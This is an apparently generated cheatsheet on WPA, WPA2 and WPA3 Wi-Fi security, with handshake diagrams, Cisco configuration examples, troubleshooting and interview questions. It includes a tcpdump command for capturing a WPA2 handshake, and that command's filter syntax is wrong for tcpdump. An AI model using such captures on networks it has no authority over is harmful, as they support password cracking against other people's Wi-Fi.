Wireless Security Wpa Wpa2 Wpa3

Category: Network Security
Type: Network Concepts
Generated on: 2025-07-10 09:08:19
For: Network Engineering, Administration & Technical Interviews

This cheatsheet provides a comprehensive overview of Wireless Protected Access (WPA, WPA2, WPA3) protocols, covering key concepts, practical examples, and troubleshooting tips.

1. Quick Overview

What is it? Wireless Protected Access (WPA, WPA2, WPA3) are security protocols designed to secure wireless networks, replacing the older and less secure Wired Equivalent Privacy (WEP). They provide data encryption and authentication to protect wireless communications.

Why is it important? Wireless networks are inherently vulnerable to eavesdropping and unauthorized access. WPA, WPA2, and WPA3 are essential for protecting sensitive data transmitted over Wi-Fi, ensuring confidentiality, integrity, and availability of the network. Without them, your network is open to attacks.

2. Key Concepts

SSID (Service Set Identifier): The name of the wireless network.
PSK (Pre-Shared Key): A password used for authentication in personal/home networks. Commonly 8-63 characters.
Authentication: Verifying the identity of users or devices attempting to connect to the network.
Encryption: Encoding data to prevent unauthorized access.
TKIP (Temporal Key Integrity Protocol): An older encryption protocol used in WPA, now considered weak.
AES (Advanced Encryption Standard): A stronger encryption algorithm used in WPA2 and WPA3.
CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol): An encryption protocol used with AES in WPA2.
GCMP (Galois/Counter Mode Protocol): An encryption protocol used with AES in WPA3, offering improved performance and security.
MIC (Message Integrity Check): A mechanism to ensure the integrity of data packets.
EAP (Extensible Authentication Protocol): A framework for authentication methods used in enterprise environments (WPA-Enterprise/WPA2-Enterprise/WPA3-Enterprise).
RADIUS (Remote Authentication Dial-In User Service): A protocol commonly used with EAP for centralized authentication.
PMK (Pairwise Master Key): A key derived from the PSK or EAP authentication, used to generate session keys.
PTK (Pairwise Transient Key): Session keys used for encrypting and decrypting data between the client and the access point.
SAE (Simultaneous Authentication of Equals): A more secure key exchange protocol used in WPA3, also known as Dragonfly handshake. Provides forward secrecy.
Forward Secrecy: If the PSK is compromised, past communication is still secure.
Management Frame Protection (MFP): Protects management frames from forgery, preventing denial-of-service attacks.

3. How It Works

WPA2-PSK (Personal):

Client <---> Access Point
     |        |
  1. Association Request
     |------->|
  2. Association Response
     |<-------|
  3. 4-Way Handshake (EAPOL)
     |------->|  Message 1: ANonce
     |<-------|  Message 2: SNonce, MIC
     |------->|  Message 3: MIC
     |<-------|  Message 4: MIC
     |        |
  4. Data Encryption using PTK

Association: The client associates with the access point.
4-Way Handshake: The client and access point exchange messages to derive the Pairwise Transient Key (PTK). This handshake uses the ANonce (AP Nonce), SNonce (Supplicant Nonce), and the PMK (Pairwise Master Key). The MIC (Message Integrity Check) ensures message integrity.
Data Encryption: Data is encrypted using the PTK.

WPA3-SAE (Personal):

Client <---> Access Point
     |        |
  1. Association Request
     |------->|
  2. Association Response
     |<-------|
  3. SAE Handshake (Dragonfly)
     |------->|  Commit
     |<-------|  Commit
     |------->|  Confirm
     |<-------|  Confirm
     |        |
  4. 4-Way Handshake (Similar to WPA2, but with different key derivation)
     |------->|  Message 1: ANonce
     |<-------|  Message 2: SNonce, MIC
     |------->|  Message 3: MIC
     |<-------|  Message 4: MIC
     |        |
  5. Data Encryption using PTK

Association: The client associates with the access point.
SAE Handshake: The client and access point perform the Simultaneous Authentication of Equals (SAE) handshake (Dragonfly). This involves exchanging Commit and Confirm messages.
4-Way Handshake: A 4-Way handshake occurs, but the PMK is derived from the SAE process, enhancing security.
Data Encryption: Data is encrypted using the PTK.

WPA2/WPA3-Enterprise (802.1X/EAP):

Client <---> Access Point <---> RADIUS Server
     |        |        |
  1. Association Request
     |------->|        |
  2. Association Response
     |<-------|        |
  3. EAP Authentication (EAPOL)
     |------->|        |  EAP Request
     |<-------|        |  EAP Response
     |        |------->|  RADIUS Access-Request
     |        |<-------|  RADIUS Access-Challenge/Accept
     |------->|        |  EAP Success/Failure
     |<-------|        |
  4. 4-Way Handshake (Similar to WPA2-PSK)
     |------->|
     |<-------|
     |------->|
     |<-------|
     |        |
  5. Data Encryption using PTK

Association: The client associates with the access point.
EAP Authentication: The client and RADIUS server perform EAP authentication via the access point. Common EAP methods include EAP-TLS, PEAP, and EAP-TTLS.
4-Way Handshake: A 4-Way handshake occurs.
Data Encryption: Data is encrypted using the PTK.

4. Protocol Details

WPA2 Frame Format (Simplified):

802.11 Header | EAPOL-Key Frame (if Handshake) | Data | MIC | FCS

802.11 Header: Contains MAC addresses, frame control information, etc.
EAPOL-Key Frame: Used for the 4-Way Handshake, contains Nonces, Key Data, and MIC.
Data: The actual data being transmitted.
MIC: Message Integrity Check, ensures the integrity of the frame.
FCS: Frame Check Sequence, used for error detection.

EAPOL-Key Frame (Simplified):

Key Descriptor Type | Key Information | Key Length | Key Data Length | Key Nonce | Key IV | Key RSC | Key MIC | Key Data

Key Descriptor Type: Indicates the type of key descriptor (e.g., WPA2).
Key Information: Contains flags indicating key properties (e.g., installation, MIC).
Key Length: Length of the key.
Key Data Length: Length of the key data.
Key Nonce: Random value used to prevent replay attacks.
Key IV: Initialization Vector (used with some encryption algorithms).
Key RSC: Key Receive Sequence Counter.
Key MIC: Message Integrity Check.
Key Data: Contains key material or other data.

WPA3 SAE Commit Frame:

The SAE Commit frame contains elements necessary for the Dragonfly (SAE) handshake, including the Scalar and Element values. The specifics are defined in IEEE 802.11-2016.

5. Real-World Examples

Home Network: Using WPA2-PSK or WPA3-SAE with a strong password to protect your home Wi-Fi network. Enable WPA3 if all your devices support it.
Enterprise Network: Using WPA2-Enterprise or WPA3-Enterprise with RADIUS authentication for secure access to the company network. This allows for user-specific credentials and access control.
Public Wi-Fi: Avoid transmitting sensitive information over public Wi-Fi networks. Use a VPN for added security. Some public Wi-Fi networks support WPA3, which offers better security than open (unencrypted) networks.
IoT Devices: Ensure IoT devices support WPA2 or WPA3. Consider using a separate VLAN for IoT devices to isolate them from the main network.

Example: Capturing WPA2 Handshake with tcpdump:

tcpdump -i wlan0 -w wpa2_handshake.pcap "ether host <AP MAC address> and ether host <Client MAC address> and (wlan.fc.type_subtype eq 0x04 or wlan.fc.type_subtype eq 0x08)"

This command captures 802.11 frames related to the authentication process. The -i wlan0 specifies the wireless interface. The filter captures association requests, association responses, and EAPOL frames. Open the .pcap file in Wireshark to analyze the handshake.

6. Common Issues

Weak Passwords: Using easily guessable passwords in WPA-PSK significantly weakens security. Use strong, unique passwords.
Outdated Firmware: Keeping firmware updated on access points and wireless clients is critical for patching security vulnerabilities.
TKIP/WEP: Using TKIP or WEP encryption is highly discouraged due to known vulnerabilities. Use AES/CCMP (WPA2) or AES/GCMP (WPA3).
Incompatible Devices: Older devices may not support WPA2 or WPA3. Consider upgrading devices or using separate networks for older devices.
RADIUS Server Issues: Problems with the RADIUS server can prevent users from authenticating to the network in WPA-Enterprise environments. Check RADIUS server logs for errors.
Client Configuration Errors: Incorrect client settings (e.g., wrong password, incorrect EAP method) can prevent successful authentication.
Hidden SSID: Hiding the SSID does NOT enhance security significantly and can sometimes cause compatibility issues. It’s security through obscurity.
PMKID attacks: WPA2 is vulnerable to PMKID attacks, which can be mitigated by using a strong password and enabling MFP. WPA3’s SAE handshake makes it resistant to these attacks.

Troubleshooting Tips:

Check Logs: Examine access point and RADIUS server logs for error messages.
Packet Capture: Use Wireshark or tcpdump to capture and analyze wireless traffic.
Test Client: Try connecting with a different client device.
Verify Credentials: Double-check the username and password.
Firmware Update: Ensure that all devices have the latest firmware.
Restart Devices: Try restarting the access point and client device.

7. Configuration Examples

Configure WPA2-PSK on a Cisco Access Point (CLI):

configure terminal
interface Dot11Radio0
encryption mode ciphers aes-ccm
ssid <SSID>
authentication open
authentication key-management wpa version 2 psk ascii <password>
end

Configure WPA3-SAE on a Cisco Access Point (CLI):

configure terminal
interface Dot11Radio0
ssid <SSID>
authentication open
authentication key-management sae
wpa3 sae psk-passphrase <password>
end

Configure WPA2-Enterprise on a Cisco Access Point (CLI):

configure terminal
interface Dot11Radio0
ssid <SSID>
authentication open
authentication key-management wpa version 2 dot1x
radius-server host <RADIUS server IP address> auth-port 1812 acct-port 1813 key <shared secret>
end

Linux (NetworkManager) Example:

Using nmcli to connect to a WPA2-PSK network:

nmcli dev wifi connect <SSID> password <password>

8. Interview Questions

What are the differences between WEP, WPA, WPA2, and WPA3?
- WEP is the oldest and most insecure. WPA improved upon WEP using TKIP. WPA2 uses AES/CCMP, offering stronger security. WPA3 introduces SAE for enhanced key exchange and GCMP for encryption.
Explain the 4-Way Handshake in WPA2.
- The 4-Way Handshake establishes a secure communication channel. It involves the exchange of ANonce, SNonce, and MIC values to derive the PTK. It prevents replay attacks.
What is the purpose of the PMK and PTK?
- The PMK (Pairwise Master Key) is derived from the PSK or EAP authentication. The PTK (Pairwise Transient Key) is derived from the PMK and is used for encrypting data between the client and the access point. The PTK is unique to each session.
What is SAE and how does it improve security in WPA3?
- SAE (Simultaneous Authentication of Equals) or Dragonfly handshake is a more secure key exchange protocol. It provides forward secrecy, making WPA3 resistant to offline dictionary attacks.
What is the difference between WPA-PSK and WPA-Enterprise?
- WPA-PSK (Personal) uses a pre-shared key for authentication. WPA-Enterprise uses 802.1X/EAP and a RADIUS server for centralized authentication.
What is forward secrecy?
- Forward secrecy ensures that if the PSK is compromised, past communication remains secure because the session keys were not derived directly from the PSK. SAE provides forward secrecy.
What are some common attacks against WPA2, and how can they be mitigated?
- PMKID attacks, dictionary attacks, KRACK. Mitigations include using strong passwords, enabling MFP, and using WPA3.
What is Management Frame Protection (MFP)?
- MFP protects management frames (e.g., deauthentication frames) from forgery, preventing denial-of-service attacks.
What are the benefits of using WPA3 over WPA2?
- Improved security with SAE, forward secrecy, and protection against offline dictionary attacks. Simplified Wi-Fi security configuration.
How would you troubleshoot a client that cannot connect to a WPA2-Enterprise network?
- Check the client’s configuration (username, password, EAP method). Verify the RADIUS server is reachable and functioning correctly. Examine the access point and RADIUS server logs. Capture and analyze wireless traffic to identify any authentication issues.

802.11 Standards: The IEEE 802.11 family of standards defines the protocols for wireless networking.
EAP Methods: EAP-TLS, PEAP, EAP-TTLS, EAP-FAST.
RADIUS Protocol: Remote Authentication Dial-In User Service.
VPN (Virtual Private Network): Provides an encrypted tunnel for secure communication over the internet.
Network Segmentation (VLANs): Isolating different parts of the network for security purposes.
Wireless Intrusion Detection System (WIDS): Monitors wireless traffic for malicious activity.
Wireless Intrusion Prevention System (WIPS): Actively prevents wireless attacks.
802.1X Authentication: Port-based network access control.

This cheatsheet provides a foundation for understanding wireless security and will help you effectively design, troubleshoot, and secure wireless networks. Remember to always stay up-to-date on the latest security threats and best practices.